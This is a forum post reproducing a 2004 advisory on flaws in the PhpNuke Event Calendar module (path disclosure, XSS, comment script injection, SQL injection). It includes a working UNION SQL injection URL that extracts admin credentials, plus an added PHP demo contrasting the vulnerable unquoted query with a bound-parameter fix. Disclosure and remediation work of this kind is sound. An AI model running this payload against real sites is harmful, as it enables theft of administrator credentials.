Security Alerts and vulnerabilities Lets keep abreast on the latest threats by posting those findings here..

Mobo, 11-17-2004, 10:31 PM
PhpNuke Event Calendar Module Multiple Vulnerabilities
Module's Name: Event Calendar
Module's Version: 2.13 - March 16th, 2004



This piece of software has many security related flaws due to poor user-submitted data handling.

A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A1 - full path disclosure in "config.php":

http://localhost/nuke73/modules/Calendar/config.php

Warning: main(modules/Calendar/configset.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11
Warning: main(): Failed opening 'modules/Calendar/configset.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11
Warning: main(mainfile.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(): Failed opening 'mainfile.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(modules//language/lang-english.php): failed to open stream: No such file or directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19
Warning: main(): Failed opening 'modules//language/lang-english.php' for inclusion (include_path='.;c:\php4\pear') in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19

A2, A3 - full path disclosure in "index.php" and "submit.php":

http://localhost/nuke73/modules/Calendar/index.php
http://localhost/nuke73/modules/Calendar/submit.php

B - XSS aka cross site scripting:

Examples:

http://localhost/nuke73/modules.php?name=C...le=submit&type=[xss code here]
http://localhost/nuke73/modules.php?name=C...p2=Preview&day=[xss code here]
http://localhost/nuke73/modules.php?name=C...t&op2=Preview&month=[xss code here]
http://localhost/nuke73/modules.php?name=C...2=Preview&year=[xss code here]
http://localhost/nuke73/modules.php?name=C...t&op2=Preview&type=[xss code here]

C - script injection in calendar event comments:

It's a serious bug - anyone can insert javascript exploit code into event comments, and if a user or admin reads it, the javascript will trigger and bad things can happen - like cookie theft, arbitrary admin operations, etc.

D - critical sql injection bugs in code:

If we take a deep look at the source code, multiple sql queries can be found where some variables, mostly "$eid" and "$cid", ARE NOT surrounded with single quotes. Therefore sql injection is possible. Further exploitation will depend on database software and version. In case of mysql version 4.x with UNION functionality enabled, arbitrary data can be retrieved from the database, including admin(s) authentication credentials. As is tradition, there is a proof of concept:

----------------[ real life exploit ]---------------

http://localhost/nuke73/modules.php?name=Calendar&file=
index&type=view&eid=-99%20UNION%20ALL%20SELECT%201,
1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors
%20WHERE%20radminsuper=1

----------------[/real life exploit ]---------------

How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~

Vendor contacted: 06. September 2004
Vendor responded: 06. September 2004
Detailed list of problems sent to vendor: 08. September 2004

Since then there has been no more response from the software developer and the downloadable version is still unpatched.

For help with patching look @ here - http://www.waraxe.us/forums.html

Additional recources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~

Free proxy lists - http://www.waraxe.us/forum/viewforum.php?f=21
Base64 online tool - http://base64-encoder-online.waraxe.us/bas...e64-encoder.php
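
The unquoted "$eid" pattern from section D next to a hardened form, as an added example that is not part of the original post and not the Event Calendar module's own code. It assumes PDO with an in-memory SQLite database instead of the module's MySQL calls; the demo_events table, the function names and all data are hypothetical and constructed for the demonstration.

```php
<?php
// Added example: constructed schema and data, not the Event Calendar module's code.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE demo_events (eid INTEGER PRIMARY KEY, title TEXT)");
$db->exec("CREATE TABLE nuke_authors (aid TEXT, pwd TEXT, radminsuper INTEGER)");
$db->exec("INSERT INTO demo_events VALUES (1, 'Board meeting')");
$db->exec("INSERT INTO nuke_authors VALUES ('admin', 'constructed-hash', 1)");

// Pattern the advisory describes: $eid is concatenated without quotes,
// so anything after the number is parsed as SQL.
function view_event_unquoted(PDO $db, $eid): array
{
    $sql = "SELECT eid, title FROM demo_events WHERE eid=$eid";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened form: reject anything that is not a positive integer, then bind
// the value as an integer parameter so it can never become SQL text.
function view_event_bound(PDO $db, $eid): array
{
    $id = filter_var($eid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return []; // invalid id: no query is issued
    }
    $stmt = $db->prepare("SELECT eid, title FROM demo_events WHERE eid = :eid");
    $stmt->bindValue(':eid', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Constructed inputs: a normal id and a value shaped like the advisory's proof of concept.
$inputs = ['1', '-99 UNION ALL SELECT aid, pwd FROM nuke_authors WHERE radminsuper=1'];
foreach ($inputs as $eid) {
    printf("eid=%s\n  unquoted: %s\n  bound:    %s\n", $eid,
        json_encode(view_event_unquoted($db, $eid)),
        json_encode(view_event_bound($db, $eid)));
}
```

For the second input the unquoted query returns the row from nuke_authors, while the bound version returns an empty result without touching the database.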
All times are GMT -5.